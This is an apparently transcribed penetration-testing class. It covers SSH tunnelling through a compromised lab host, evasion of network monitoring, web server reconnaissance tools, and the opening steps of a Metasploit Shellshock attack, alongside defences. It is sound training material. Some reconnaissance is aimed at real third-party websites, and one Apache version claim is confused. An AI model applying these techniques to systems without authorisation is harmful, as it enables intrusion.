Very good. If it is clear, please drop C in the chat so that we can move on with the next two techniques. And once we are done with that, we'll move on to web application part. All right, so can we move on? Hello.
Yeah, yes, sir. Yeah.
All right, very good. Great. So let's move on to, I hope you all are able to see my screen too. So with dynamic port forwarding, we can access whatever device that is there on the target network by simply gaining control on one single computer. In fact, we actually took advantage of compromising this Metasploitable 3 device. So we figured out some SSH credential to do that. In fact, there are a bunch of other vulnerabilities too that you can exploit and gain access. We'll talk about that in a short while, but let's move on to two more techniques that we can actually use once we gain access to the target mission. Do remember or note down this point in your notes as part of post exploitation. Don't always think about privilege escalation. I mean, that is not the only thing that we are going to do, right? There are a lot of other activities. So you need to enumerate the mission even after gaining access to the target device. So it can be a normal user level access or a full administrator level access. You must put efforts on figuring out ways to compromise other devices on that network. So that is what we are doing before the break. So let's move on to yet another SH related concept. I mean, SH tunneling technique or port forwarding technique that we can apply. So in the previous scenario, I've showed you how to go with dynamic tunneling. So in case of dynamic tunneling, we are going to take advantage of using proxy chains to connect to any device, any port from there on. By simply using the tools that are part of Kali Linux, we can perform it by prepending proxy chains to all the commands. So apart from this, how about taking advantage of performing something called as reverse tunneling? I mean, if we already gain access to the target device, how about taking advantage of forwarding the port that is already present on the target mission onto our computer? Let's see if we can find this SH port on a Metasploitable 3 device or not. So I'm going with 208 to verify port 3306. And if this port is closed, okay, it is open. Let's run a quick nmap scan and see what are the ports that are open and what are the ports that are closed. So this can take some time. Very good. We have the results and we can see 445 is also open. So you can perform something like SMB scan, enumerate the SMB services. If there are some shares, you can connect to that share. How about 5900? Oops, we need to specify the port option. $5900. It is filtered. VNC port. Is it really running? Let's check. netstat-antp. I don't think it will be running. 5900. No, there is no 5900. Or else let's move on to this device and see what are running there. Obviously, I can't directly connect to the target device. So I'm gonna perform something called as local port forwarding to connect to the target device service. Okay. So if I take advantage of performing port scan directly onto the HSV box, we know that we will not be able to do it. But with the advantage of proxy chains, we can do it. The other thing that you can perform is SSH local port forwarding. I mean, take down the same exact command that we used before, but we are going to modify it a little bit. In the last part, we actually used SSH with dynamic tunneling option. So 127.0.0.1, and we forwarded 9050 or 8080. It is up to you on whatever port that you want to forward. And the target details. So target username and IP address. This is what we did before. So that is for dynamic tunneling. Now let's replace these options. I'm going to perform local port forwarding this time. What is the advantage of local port forwarding? So this particular device is able to communicate with all other devices on this network. And this device may have FTP port open or else some other service port open. As we already enumerated this device, this is the reason why I actually performed all the scans on this device on day 2 or day 3. So we already know that there is port 8080 open. Port 8080 is actually running some service, and also port 80 is running some service. So let us imagine that we don't have access to a graphical interface to this initial foothold, but there is a web server running. So this is kind of web server running in the network, local network. I want to access this web server through this particular computer. This is where local port forwarding can be applied. I'm going to pick one of those random ports on my computer and ask this Metasploitable 3 device to give me access to this local port. Local port. So services that are running on any of these devices that are on this network, right? I want that service related access. So I'm going to tell any of these interfaces on my computer, right? So please note down that this is Kali Linux mission interface or IP, followed by the port that you wish to use for this connection. So let us use 3535 and connect me to 10.20.20.16, right? On port 80, there is web application. That is what I want to access. This is what we are trying to access on our own local mission. So this is all going to happen through the Metasploitable 3 Ubuntu device. All right. Now port 80, which is generally not accessible, right, directly, I can access that now by going on to loopback IP address, my own IP address for port 3535. Hello. Are you able to see that? We are able to connect to HSV box directly. All through this particular thing. Again, the same exact access that we have with dynamic port forwarding also, but it depends on what kind of situation you are at that moment. At times you may not be able to set up the proxy chains, right? In that case, this SSH local port forwarding works. All right. One more thing to note, as we already know the target mission 10.20.20.16 is running SSH, but it is not directly accessible. How about taking advantage of forwarding that SSH port to our mission? Of course, before you start connecting to that mission, you need to make some netcat connections to the target device to unlock the port and then access it, right? Now, are you understanding what is the advantage of SSH port knocking concept? In fact, that is not always considered as something very good in security perspective, but any kind of additional layer that you add is always beneficial. Now with this SSH tunneling, right? I mean, local port forwarding and all, attacker will not be able to grab that SSH service from the target until and unless the target mission is knocked with a specific sequence. You will not see that port open. And with this tunneling, you cannot do. This is only possible with dynamic tunneling that we already performed. Hello, are you understanding? So is this local port forwarding clear? If yes, drop L in the chat so that we can move on to one last thing, which is remote port forwarding.
Can you please explain again this?
This local port forwarding?
Yes, this entire command you have written.
Okay. So what is that we are doing here is going with SSH. SSH local port forwarding will allow us to open attacker's port number or attacker's attacker's port number on a specific interface or all interfaces. Attacker's IP with attacker's port number. So whatever port that you wish. And asking the target device to allow me to connect to the port 80 running on a specific device inside the network, in the internal network. So the internal target IP address colon internal target port number. How we are doing all these tasks? Through our external target. So external target at the rate target's IP address, external target IP and username. And IP. All right. So in general, if I directly go onto browser and try to access 20.20, 10.20.20.16, it is not going to work. Hello, this is cache page. So let me clear all the cache. If I try 10.20.20.16, no way. There is no route towards that device. But with this one, we are just asking it to forward the internal port onto the external side. Got it? So someone was talking about this kind of tunneling in the morning, right? So any kind of service that is running local or on the internal server, this is how attacker can forward it to external world onto his own Kali Linux. What is the triggering point? One single port that is open and allowing incoming connection from external world. So can anyone tell me what kind of precautions that you can take here? There are so many things that you can apply. Let's see what kind of precautions that you come up with. How can we guard against this kind of attack?
Group policies.
Pardon?
Can we apply group policies for this, Jayant?
Very good, very good. You can apply group policy. Say if it is on Active Directory environment, you can apply a strict group policy on not allowing specific users to forward any ports, or else the simplest thing that you can do is apply all aggressive rules on not going out from a specific port or a random port, right?
Right. Yeah.
Strict firewall rules.
Yes, very good. Strengthening the firewall rules, external firewalls, internal firewalls, I mean host-based firewalls and so on. Pardon?
Disable TCP forwarding.
Yes, disable TCP forwarding, very good. Now, are you all understanding what is the importance of egress bursting and ingress bursting? So we always keep an eye of everything that is coming inside, but this is completely a outbound communication. If you're not writing a strict rule to block any outgoing traffic, this is how simple it is for an attacker to tunnel the traffic and take this through that particular device. And yet another interesting aspect to this. Let me rerun this particular command once again. Now, if I filter this traffic, or else if the target is using some kind of Wireshark or something else, will they be able to see that the communication is coming from my mission? Let's test this. So for the sake of simplicity, I'm running Wireshark on my Kali Linux, but you can also use TCP dump or T-Shark on this terminal versions of Ubuntu or Linux, right? So let us start ETH0. Will you be able to see something on ETH0? Are you able to see something on ETH0? At least for IP.addr. Obviously, this is all UDP traffic. That is because of our teams. But let's filter this 192.168.0.208. All you see is some NetBIOS traffic. That's it. Is there anything associated with TCP.port is equal to 3535? Nothing. Right? Can anyone tell me why we are not able to see the traffic?
Because it's on port 80.
Okay, it's on port 80. Let's check port 80.
It is going
Nothing
through
on port 80.
SSH. Port 22.
Pardon?
It is going through port 22.
Port 22. Let's do 22. Nothing. Where is this traffic going? So let's change this interface. Everything that you are performing here, right,
Loopback interface.
is going on loopback interface. Who is that? Is that Mr. Samir? Let's select loopback and rerun this and see is there anything associated with port 22. Now let me go and try making some kind of communication with the target. 10.20.20.16. This is what happens even in case of, sorry, we will not be able to access that directly. 127.0.0.1:3535. This is where our traffic is. And everything actually goes through this particular interface. Let's rerun this thing. Okay, I think we are doing it through that SSH port. No problem. Even if you do it with ETH0, you must be able to see because that is how I configured it. Or else let's try doing the proxy chains and then verify the traffic. That will be really easy for you all to understand. So I hope you all remember the proxy chains concept. So let's set up that proxy chains and then see how it works. So I'm going with SSH dynamic port forwarding on 127.0.0.1, right? And port A9050, right? So 9050 is the one that I configured in proxy chain. So I'm going to use the same one. Vagrant 192.168.0.208. Right. So as I didn't use this -n option, you can see the terminal prompt. But if I verify my network connections, we have that. Proxy chains, where is Wireshark? So let's do it on loopback. Firefox http:// 10.20.20.16. Are you observing that? Everything is going on SSH. There is no way on what kind of traffic that you are accessing. Now, if this is a kind of internal server, and if I try to perform some web-based attack, uploading some kind of malicious payload or some kind of SQL injection, right? Your firewall may trigger an alert because of the strings that are present. But now, no chance, because it is seeing this traffic as completely encrypted traffic. Hello? Of course, there is a specific port number that you can actually observe. And most of the times we only apply this filtering or else monitoring on specific interface. Say if I go on ETH 0, and try to reload this page and try to identify any packets that are associated with this 208, you can only see SSH connection. If the monitoring is not applied on all different interfaces, each and every network that you have or every interface, you will miss out on a lot of different things that are secretly happening under the hood. Right? So this is why we mainly focus on knowing the basics, right? So that you can take full advantage of all the basic utilities on performing advanced attacks. Not only attacks, once you do understand the attack, you will be able to fix them. All right. So we have seen how we can actually apply something called as local port forwarding and also dynamic port forwarding, right? So just to cut down the time, I will demonstrate the dynamic remote port forwarding after 1 or 2 practicals. Okay. So there is a specific practical where we'll gain access to the target in the web application part. There I will show you the remote port forwarding. Are these two things clear? Local and dynamic? If yes, please drop 1 in the chat. Or if you feel a little bit difficult on this, please drop D in the chat. It started getting complex, right? No worries, no worries. Please do watch the recorded lecture once again, right? And let me know or drop me a message or write me an email if you feel difficulty, so that on last day I will touch upon the things that are required. Okay. So in case of dynamic port forwarding, we can access whatever device that is part of the network by simply taking access to one single device and setting up dynamic port forwarding. You can use proxy chains to access any device. In case of local port forwarding, you are taking advantage of making connection to one of these devices, right? And asking this device to forward some local service onto the attacker device. Remote port forwarding is a situation where you gained access to one of these devices, but there is a service that is running locally. How you can forward that one? We can do that with the help of remote port forwarding. We'll show you that thing in web application module. Let's not waste any time. Jump onto web pen testing. As CPENT is not a complete web application pen testing course, this module is going to touch upon the core aspects of exploitation techniques that you can take advantage of in compromising the network through the web application. I hope you all heard about web application attacks a lot of times so far, and I hope you all are familiar with common types of attacks like XSS, SQL injection, local file inclusion, remote file inclusion, and so on. Let's take our basic web related knowledge to the next level with the attacks that we are going to do now on HSV box. For these demonstrations, I'm going to switch to HSV box and then do all the practicals on HSV box. So again, not to confuse you with all this tunneling, I'm going to set this particular mission on bridged so that we'll have direct access. Again, let's simply reboot this. It will be easy. So please note that even in the CPENT exam or any kind of pen testing certification or pen testing related job that you are going to pick up later, these tunneling concepts are very, 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 very important. Right? So at the starting stage, they look quite complex, but they are not that complex. I recommend you to revise, then it will be easy. All right. Very good. Let's take advantage of direct IP addresses and then perform all the attacks on these devices. TH0. This is on 208. This is on 141. Perfect. Let's start. With the web application related aspects, we always wanted to take advantage of that server. I want to control that server remotely. One single thing that you can do is to compromise the web server technologies and gain access. When I say web server technology, it can be Apache or IIS or Nginx. The core web server software may have n number of vulnerabilities that you can exploit and gain access, same as what we did for other services before. So there can be FTP port that is open using which you can perform this, or there is some kind of direct exploit, remote exploit that you can run on the service and then gain access. In fact, Apache is really vulnerable. So most of these Apache versions are there with tons of remote code execution vulnerabilities exposed. If you can find Apache server that is really outdated and have some remote code execution vulnerability, that becomes easy point on gaining and compromising that device. And again, after compromising that web server, penetrating into other devices and then performing all other enumeration exploitation on those devices must be done through that tunnel that I've explained you in the morning. So let's mainly focus on the web server aspect. Please note down these 2 points in your running notes. Whenever you come across a web server, when I say web server, it must be running some kind of HTTP service. It can be on port 80, port 8080 or 8181 or 8282, whatever port that they configured this service on. You all know how to run nmap scan to identify ports that are running HTTP service. Of course, we'll run all port scan and see what ports are open, and we'll individually trigger these ports to see which port is running HTTP service. And after performing this identification, the first thing that you must do is to identify the web server technology. If that web server is vulnerable, then you can directly attack and exploit it. Or you need to take advantage of enumerating web application and exploit that application to gain access. So these are the two things. One, web server exploitation to gain access. Two, taking advantage of web application and then gaining access to the server. So let's look at few attacks that we can perform, right, based on the web server and also web application. So instead of digging into all OWASP top 10, which is not a major focus or out of scope for this particular course, but we will look at three most dangerous type of vulnerabilities that must not be there on your web application. Even if these vulnerabilities are there, and if there are some misconfigurations that are added onto this, then it is going to be very dangerous. And instead of going on to the dummy websites like DBWA or Metalliday, let's do it on the real life applications like WordPress or Drupal or something else. Drupal, we actually observed that how to perform it later. So let's focus on WordPress this time. So please note down the process, starting with the web server related attacks. If you are going to compromise a web server, I'm not going to waste my time with this theory. I recommend you all to please go through the theory. Because of timing constraints, I will not be able to go through all the theory part, but let me give you the core ingredients so that you can get ready for any kind of attack that you want to do or exam that you want to write. So the web server thing, web server software or web application logic is our major focus now. Please note that even the SQL injection vulnerability, that is not database related attack or database related vulnerability, it is the vulnerability in the application itself, right? Web application itself. Taking advantage of vulnerabilities in the web application, you are able to gain access to the database contents. Of course, there are n number of ways in which you can exploit this. Let's start with the web server. Obviously, to identify the web server technologies, we'll use Nmap, right? Identify the ports that are open, what kind of service that it is running. Most important things to do on a web server are to see what kind of configurations are done. So let's start with our Metasploit build 3, which is running at 208. This Metasploit build 3 device is actually configured with a lot of different services, but the Apache service is running a specific functionality that allows this web application to run some shell code. This shell, I mean Linux shell, was vulnerable since many years. The actual vulnerability that I was talking about is called as shell shock vulnerability. This shell shock vulnerability is actually came out in the year 2014, and it was really simple for anyone to trick this vulnerability in the web application to gain access to a shell on the target computer, if this functionality is enabled in the Apache configuration for that server. So to understand how we can exploit this, we must do some kind of pre-enumeration. So when I say pre-enumeration, note down, always take advantage of looking at different directories that are present. So let me go on 208. Files, directories, right? And what kind of technology it is using, you must identify all these things. One of those tools that really help you a lot is Vapalizer. Vapalizer browser extension can easily give you this information. The other way is to use a tool that comes pre-built with your parent and colleague called WhatWeb. So WhatWeb followed by the actual URL can actually give you details related to technologies, that are running on the target device. Can see Apache 2.4.7. In fact, Apache 2.4.7 is the one I think which is really vulnerable. Again, the same story repeats. You must go on Google, ask Google what kind of vulnerabilities are associated with this Apache version. Can go on cvdetails.com to see what are the severities. And there is some kind of exploit that is available. Again, go and check whether it is a remote exploit or local exploit, what kind of access that you will get, because we don't want to get into some DOS related attacks, right? So there is a 0-day vulnerability for 2.4.49. So everything that is below 2.4.49 is actually vulnerable. This was recently discovered. All the servers that are running 2.4.49 are actually vulnerable for this remote code execution, right? So that is why web server related technologies are very good for enumeration and also giving you initial access. From defense point of view, you must always keep these service level softwares up to date. In fact, any kind of server software that is exposed to the internet must have a latest version and have strict configuration to stop unauthorized conversations or communications to that server. Can see there are some bypass related, there is some DOS related. We are not going to concentrate on DOS, but it must be some kind of remote code execution. So with this particular what web, you are actually seeing the versions, and you are based on these versions, you are identifying vulnerabilities. So similar to this, you can also take advantage of enumerating other technologies that are actually helping this website to run. So what web? So by default, this what web is going to do a passive scan, but you have options to adjust this and force this to run aggressive scan, which can give you even more details by enumerating all the technologies and technology related plugins and misconfigurations. But for now, to keep it simple and not to cause a lot of damage to the servers, I'm just running a passive scan. And you can see this is running on a Cloudflare server with IP address as this one. Whenever someone try to access HTTP version of this website, it redirects to HTTPS version. Very good. And moving ahead, there is HTML5, and on the background, there is WordPress running. WordPress version 5.7.4, right? You can easily get this information from the Vapalizer plugin extension here. Very good. This is one compulsory thing that you must do. I hope you got this idea. These are all pre-exploitation parts. So when you are writing down these things in your notes, note it down as web server exploitation and pre-exploitation step. So one is what web that you can use. Yet another tool is to go very passive and identify web server related technologies and what kind of operating system on which web server is running. To do that, you can use something called as P0F, passive OS fingerprinting, so which is not by default present. So you can install it using apt install P0F, passive OS fingerprinting. Note down P0F. This is the command to install. And to start passive OS fingerprinting, P0F -I ETH0. I'm specifying the interface as ETH0 and going with verbose result. I think we must give -V here. No. I is interface. Why it is not working then? I interface listen. I think we must run this as a root user maybe. Sudo passive OS fingerprinting -I ETH0. Very good. Started. So with this thing up and running, I can browse to any website and see what are the things that it can identify. So let me go on smec.ac.in. It simply records all client related information and also server related information. So if you go through this information, you can easily figure out what are the server related technologies that are running there. So there is some kind of Google plugin or extension that is running. So 207 actually made a connection to this particular IP address. By simply observing this, you can notice that the server, when I try to visit smec.ac.in, it is not only acquiring information from one single machine, it is going on to multiple devices and then grabbing this detail. So client related information, we can see that this is a Linux machine. If you scroll through this result, somewhere you can also identify the server related information. The server details. I think the IP address of this server is 119. Let's break this execution with Control C. Able to break this? Yes. Control Shift F to find 119 from the terminal. Yes, here it is. So 119.235.48.133. You can see this is the client information. Where is all 119s? Let's check the next entry of 119. Are you observing this? This is the server detail. It is guessing that the operating system can be Windows 7 or Windows 8. Of course, it may not be that accurate. So it will actually grab the banner. If it is a Windows with 1700 or so, it will feel like it is Windows 7. It can be Windows Server 2008 also, right? Based on the banner. So these are the tools that you can easily use on figuring out what kind of web server software is running on which operating system, right? Few other tools that you can use are IDserve. You can download IDserve from this website. Let me drop this link in the chat. It is a Windows-based utility. Once you download, it opens up this graphical panel. Simply put that information, domain name, query the server. It will grab that server details and display it. Again, it is bringing all this information from the request that you make, right? So based on the basic understanding that you have, you can use n number of tools. You can use netcat to connect to that port and then make queries, or you can use curl to make a request and then grab this information, or you can use Wireshark to identify these details, passive OS fingerprinting, or Nmap, right? You have multiple alternates now in your hands. You can make a simple curl request to smec.ac.in, and there you have all the details. So if you go with verbose result, you will see request and also the response, right? So the request headers and response headers. Here you can see that it is running 4.34. Hello. Am I giving you all hints? Please don't attack any of these servers. Right? This lazy fellow is nowhere responsible if you are trying to hit them with that queries. Okay. This is pure a skill training, not some kind of black hat training. Okay. All right. After identifying the web server version, I can think of some kind of configuration that these servers have. Now, coming back to the shell shock vulnerability. If you do a little bit of Googling, So this shell shock vulnerability allows anyone to execute arbitrary code on the shell. If this module, I mean shell CGI module is enabled on Apache server, you can actually execute shell scripts, right, on web application. Have you ever encountered web applications or web pages that display date and time? These date and time are actually coming from the system itself. The chances are these are executed by the Linux machine on the shell, right? By taking advantage of CGI module enabled by Apache. Now you can start looking at different websites and see where this date and time is coming from, right? So IRCT or any kind of website that actually displays date and time. I'm not telling that for sure there will be this particular thing enabled here, but you can actually see the date and time that are present. If I execute date command on Linux, you can see similar kind of format. Hello? And are you observing that? This is the same thing that it grabbed. So if it is running on Apache, the chances are this particular server is taking advantage of CGI module, right? That is enabled for Apache to execute all this content. Are you understanding? With this basic knowledge, enumerating this target device, in general, all these scripts are actually placed under CGI bin directory inside the web root location. You're not allowed to access this particular location at all. But the chances are, if you try to take advantage of searching for files that are present here inside this directory, you will be able to see that there is a shell script that is present. In fact, on this server, hello world is the script that is present. .sh. You can see hello world is displayed. So this is coming from, this is a shell script that is executed on the Linux terminal of this Metasploitable 3 device. There is a very good module that is part of Metasploit which can help you on gaining access to the shell because of this vulnerability. Right? Anyhow, here there are certain aspects that you must remember. I am searching for the CGI bin directory because I know that this is Apache server and a Linux machine. If it is something else, I will not be able to do this particular aspect there. If it is not a Linux machine, if it is a Windows server, if it is not Apache, if it is some other server configuration, I may not be able to see this CGI bin. It must be something else. How we can know all those aspects? Add to this list. After checking the server version, you must perform some kind of vulnerability scan. Nikto is an inbuilt utility that you can use on identifying vulnerabilities associated with web application. I hope you all used Nikto before. Hello? How many of you have used Nikto before? Are you all there? So Nikto can help us identify all these sensitive directories or any kind of misconfigurations that are present on the target server. It displays the CVE details. It also displays what are the sensitive panels that are exposed. So it found phpMyAdmin directory. So you can see a bunch of other directories where indexing is found. Directory indexing is found. So main root directory, there is directory listing enabled. So you can see directory listing here. Directory listing is enabled. That is the reason why I'm able to see all the content. If not, I must not be able to see all this content. Are you understanding? Please take down the nicto command, nicto with -h and the IP address of the target device. One more tool that we commonly use is directory bursting. You can use dirb for doing this particular job. Dirb or GoBuster. How many of you have used GoBuster or dirb before? So directory bursting, looking for all common directories. This is nothing but brute forcing, right? We are going to take some common words and then try checking if that particular directory exists on the target server or not. So let us take advantage of running this on 192.168.0.141. I configured n number of misconfigurations there, so you can perform all different attacks. You can see dirbuster tried identifying a lot of different directories. There is a directory named as backup, right? There is asserts directory. There is index.html file. Inside this, there is PHP myadmin. And the interesting part about this dirb is it will try to identify the directory first and then try entering the directory and seeing are there any files that are present inside it. For example, it identified backup directory and it tried checking are there anything present inside this backups directory. Is directory listing enabled or not? Yes, directory listing is present. I mean, a directory listing is possible here. If there is something that is present inside directory, we will be able to see this. To show you the severity of this, let me go on to that server once again, 141. Backups. Oh, sorry, backup. You can see contents inside the directory. And one more thing is the web server related details. As you have not modified the banner, I'm able to see that server details. No scans required. By simply heading to some random directory, you are going to throw some error. You are going to get some error back. And the error messages are really handy. Right? So if I go on iare.ac.in, a live website, but here I'm going to try accessing some random directory. Very good. They configured it correct. Are you observing that? These two are same message. But here they removed the banner. They modified the Apache configuration file. That is the reason why I'm not able to see the server information. But here I'm able to see it. Do you remember when I go on showdown.io and search for some web applications, port 80s and so on, we came across some Nginx pages here and there. So that error messages clearly give us that there is specific web server software. And if it is not properly modified, you can also get the pinpointed version of that particular server software. Anyhow, these are all information gathering aspects of web server or web application. And there is a file called as phpinfo.php. Let's see what is there inside this particular file. Let me copy this content. If I open this on, there is PHP login. If you log in, then there is a chance that you can control the entire database associated with it. We'll look at all those attacks in a short while. Interestingly, there is a WordPress application also. If I go on the same exact server with WordPress as a directory name, you can see there is a WordPress application. You can think of this as a web application, a live website, same like RaceReva. This is also running on WordPress 5.7.4. Here it is running 5.0.8. Of course, this version doesn't matter here because There are exploits because of plugins, themes that we actually come across on these applications. Got it? So dir bursting can do this job. So if you ask me on how I can know that CGI bin script is present on Metasploitable 3, this is how to identify it. Similar to this, there are a bunch of other utilities also. Let me drop the utility names in the chat for your reference. I highly recommend you to look at those tools too. Dirb is one thing that you can explore. And dirbuster is also a default utility that is part of Kali and Parrot. And it is a graphical version of the same dirb utility. If I run dirbuster, it opens up a graphical panel from where I can select the word list, browse different word lists, specify the URL, start. It starts identifying all the directories. All right. And the next thing that you can use is GoBuster. GoBuster. Identifying server version, performing a vulnerability scan using Nikto, identifying directories using dirbuster, GoBuster, or dirb, right? And one more thing that you must do is to look at robots.txt. This is one of the sensitive files. Of course, this is not for the actual users. This is for search engines. Whenever you go on Googling something, right? Google must connect to your server or crawl through your entire website and look for the links that have the keywords that the users are searching for. But why you will be displaying every page that is part of my application? For example, Race Reva is actually running on WordPress. So if it is on WordPress applications can be controlled using the WordPress admin panel. WordPress admin panel will actually reside under WP-admin location. This is the point of contact. If someone can log in through this page, there is a chance that they can do whatever thing that they want to modify on the web application. Right? And similar thing is here, WP-admin, under WordPress, there is WP-admin. I don't want to expose this page to the search results. If I expose this page to the search results, anyone out there on the internet can actually start doing some kind of brute forcing here. Of course, you can stop people from not doing brute forcing. That is additional security measure that you can add. That is what Race Reva people also did. But please note that there will be certain sensitive pages that you don't want search engines to crawl. To tell search engines this information, we are going to have robots.txt on our web root location. When someone hit this particular location, whenever a search engine is going to connect to your website or else crawl your website, it will first look for robots.txt. If robots.txt is present, it is going to check what are the entries that you are allowing and what are the entries that you are disallowing. So if there is a disallowed entry, it is not going to crawl. So let us go on Race Reva and check for robots.txt. Are you observing that? So if you go on internet and search for this particular link using Google, you will never ever find this directory. Say if I apply a simple Google in URL, right? If this word is present, WP-admin, for which site? for race Reva. Oh, what happened? For this particular domain, if you find admin panel display, see? No, Google will not be able to show you this because Google know that Trace Reva didn't allow it to go and pick this particular entry. But as an attacker or penetration tester, while enumeration, you found that there is directory like this. What is the immediate next thing that you do? You will try to access that manually. This is where your defenses must play a major role. You must restrict on who can access this, who cannot access this. For example, if I go on hackerschool.in, even this one is actually running on WordPress on the same Cloudflare flavor, right? So, but this is running on 6.0. If I try wp-admin, it must display some customized page telling that no, you are not allowed to come here. Are you observing? Even if someone want to try some kind of brute forcing, there is no possibility because they are not able to access that page. Yes, for sure, admin panel will be there, but it is somewhere else, not on this particular location. Now, if I go on cbit.ac.in, even this one is running on WordPress. In fact, major applications, a lot of different web applications that you come across nowadays are going to run on WordPress. So WordPress 5.8.6, if you check for wp-admin, boom, there is a possibility of brute forcing. Got it? Yet another advantage that you can have with directory bursting is not only admin panel. In fact, if admin panel is accessible, there is a chance that I can go forward and check for other sensitive directories that are associated with this WP scan. I mean WordPress, because in case of WordPress, the directory bursting clearly tells that there is WP contents, themes, uploads directory. So this uploads directory is always interesting. It will have a lot of documents placed. If the server is vulnerable for directory listing, then you will be able to see the contents. Hello? People ask me from where we can get sensitive documents, how to do OSINT, how to perform information gathering, how to know employee names. If the harvester is not working, see, there are chances where these documents may have some kind of information for you. There are images that are used in this website, especially if it is an academic institute, you will have documents that are placed. See, why all servers will fall for this trick, right? How many of you say that Race Reva is not blocking this? Before I open this, tell me. Are you sure you are able to see the content here? No. Hello? Interestingly, they also made some modification to the server software, but you know that it is running on Apache. You can actually remove everything. That is a different story. Anyhow, it is not like if someone knows the version of the software, they can exploit, right? So if you are blocking them from not allowing you to allowing them to exploit, then it's okay, fine, up to some extent, right? Are you observing that? This kind of defense that you must put in place. Simple enumeration techniques that I told you are more than enough for us to know whether the target is there with known vulnerabilities or simple ways to exploit or not. Is everything clear up until this point? Can we move on to the exploitation part? If yes, please drop E in the chat. Let's move on to the good part. So are you all really excited or else feeling bored? If you are really excited and want to see the exploitation, turn on your mic and say hello once.
Hello.
Hello. All right, only one from the attendees.
Hello.
Yep, very good. Only one popping out at a time.
Hello, sir.
All right.
Hello.
Okay, very good.
Hello, hello.
Very good. All right.
Sir.
Very good. This fills the confidence in me saying that you people are not sleeping. All right, let's move on. Now let's move on to the good part of it. Obviously the exploitation. But before moving on to exploitation, all the enumeration steps that you are performing, right? So how many things that I told you? There are n number of things that you can do, but we are concentrating on the core parts. Web server technology identification, robots.txt. Yet another file that you can check for is sitemap.xml. This is yet another sensitive file that can have all other links. Say if you are not able to see Google revealing all the subdomains, there is a chance that certain sensitive pages can be revealed with this. These are all common pages that cannot be avoided by the administrators, but these act as a standard base for us. Of course, until and unless someone can attack this, there is no problem, right? So it is like no problem telling them that I am using Apache. But if you are telling them that I am using Apache, that too vulnerable Apache, there is no firewall, that becomes a problem, right? So leakage, information leakage is also considered as a vulnerability, but not the severe one. I think you all know how all vulnerability management, vulnerability assessment thing. So you are able to understand those aspects, I think. So sitemap.xml, robots.txt, and directory bursting, performing NICTO vulnerability identification. One last thing is to check whether the target have the firewall or not. By simply performing nmap scan, you can easily know whether the target is firewalled or not, or else you can make use of a tool that comes pre-built with most of your Linux machines, so Kali or Parrot. It is WAFOOF. Please note that if WAFOOF is not present, you can install it using apt. You can simply grab them from the repositories. With the latest versions, what they did is both on Kali and Parrot, they removed default packages, but they are still existing in the repositories. You can simply grab them from the repository and run them. So let's see if Race Reva is behind a firewall or not. Obviously, it will be there behind a firewall, no doubt. But let's see. Are you observing? It is using Cloudflare's web application firewall. WAF detected. Now you must do the research. How to bypass? How to bypass is not that simple. You must understand what is the defense that is there in place. Then only you can bypass. So you must go and read about Cloudflare now. All ins and outs when you configure Cloudflare. There comes the actual bypassing. So attacker's job is not that simple. It is always a struggling thing, and every time when they are going to exploit something, they are going to come across something new. They must learn that at that point and proceed further. All right, now it is time for us to go and take advantage of exploiting the web application. In fact, I'm giving only one example at a time. You can go and take advantage of running this against multiple devices. Say, for example, smec.ac.in. There is no web application firewall detected. There can be some network-based firewall or host-based firewall, but this particular tool is more specific about web application-related firewall fingerprinting, right? And one more thing, one more example that I want to give, iare.ac.in. This one is If I go on robots.txt, there are a lot of entries. One thing this web admin did is they actually placed the default robots.txt page that comes with Drupal installation. You know, I no need to perform any kind of vulnerability identification. I can simply tell that this website is actually running on Drupal without looking at Vapalizer. Even Vapalizer can tell you that this is Drupal, but without looking at that, I can say, because this is the pattern of how the web, this is how the Drupal thing, the Drupal actually customizes or places the robots.txt with the default installation. This is where customization is important. As you observe in Race Reva case, we are not seeing that because they took that efforts, additional efforts on modifying it. They are not leaving it to the default. Of course, this is, I think, WordPress default pattern, right? And again, you can see the differences by simply looking at these error messages too. For example, if I go on a random page here, not found, right? And here, not found. But from this, I can easily understand that this is Apache. Why? This is how Apache displays the message. In case of Windows, you will see what message? You will see some kind of server error. Am I right? 500 status codes. So by simply looking at these things also, you can say. Anyhow, my intention is to show you one interesting page here. There is some password. Of course, this is disallowed. Okay, that is for robots. I mean, for search engines, not for me. Right? So email new password. Let us imagine that somehow you gained access to one of the employees' email ID or administrator's email ID. Now you can actually reset your password here. Hello, isn't it a sensitive page? So can anyone tell me what kind of defense that we can apply here? Of course, this robots.txt is for search engines, but what kind of additional defense that can block unauthorized users from accessing these pages?
By simply not displaying any error messages or removing all default pages.
Very good. Removing all default pages is one thing, or redirecting them towards a different location.
Or
Not
put
showing them
messages, wrong error codes or something different, or it should be one error code like please contact the administrator kind of a thing.
There's something like this. Facebook.com. Check. Customized page. No information disclosed. This is how you can do it. And one more thing to note as part of defense is if robots.txt is present, of course, this is compulsory. If you don't want to allow search engine to access this, it's okay, fine. But you must also put restrictions on which IPs you can access this particular link. I mean, as a random party somewhere from internet, I'm able to access this particular location, this web page. So your web application or web server must have that smartness on detecting that this is really dangerous, right? And detecting from where this query is coming. Obviously, this query, I opened it on my browser from my IP address. Obviously, this will be recorded there. If it had that smartness on detecting that this is coming from a random IP address, which was not known in general, then immediately this is going to stop. I mean, web server must stop or block that user. Means you must put some kind of geographical restriction on who can access this page and who cannot access this page. In fact, when you access Amazon.in, do you know that Amazon had lot of smart identifications running behind? Most of those things we don't even know that Amazon actually does, right? Of course, they do that for our convenience, for our security only. So we all know that Google if you try to log in from a new device, from a new location, Google immediately detects that you are coming from so and so device, so and so location, which is not a usual location, and you'll receive an email, right? How Google is going to tell that? There is some kind of smartness added to the server that is going to detect that there is something wrong going on, right? So these are all things that are going to help us a lot in guarding against the common types of attacks that are possible because of this common locations or directories. Now let's start our exploitation skills by exploiting the shell shock vulnerability on 192.168.0.208. Please note that these are all things that may not be there in the lab manual or iLabs. That is the reason why I gave you specific devices. But for people who are planning to write exam, this is yet another secret. This one of those missions in the network practice range is actually vulnerable for shell shock. So interestingly, the technique will not be there in the lab manual because they want you to explore and follow the process methodology. Once you are done with the actual understanding of methodology, you will be able to exploit it. So to exploit the shell shock vulnerability, I'm going on MSF console and load my Metasploit framework and take advantage of picking up a module that is named as Apache mod CGI bash environment exec. So you can simply search for Apache mod or go on Google and search for shell shock Metasploit. So there are tons of articles, and Rapid7 is a standard source where you can get the module related information for the modules that are already part of Metasploit framework. So this is the one that I was talking about. Why wait? Copy. Load. And you can see it automatically picked the Linux interpreter. That's okay, fine. We are happy with that. Obviously, it will ask for SRV host. This is a remote attack. So, sorry, not SRV host, R host. As you can see here, we must provide R host value, then only we can reach the target. R host 192.168.0.208. Right? And L host, L port, 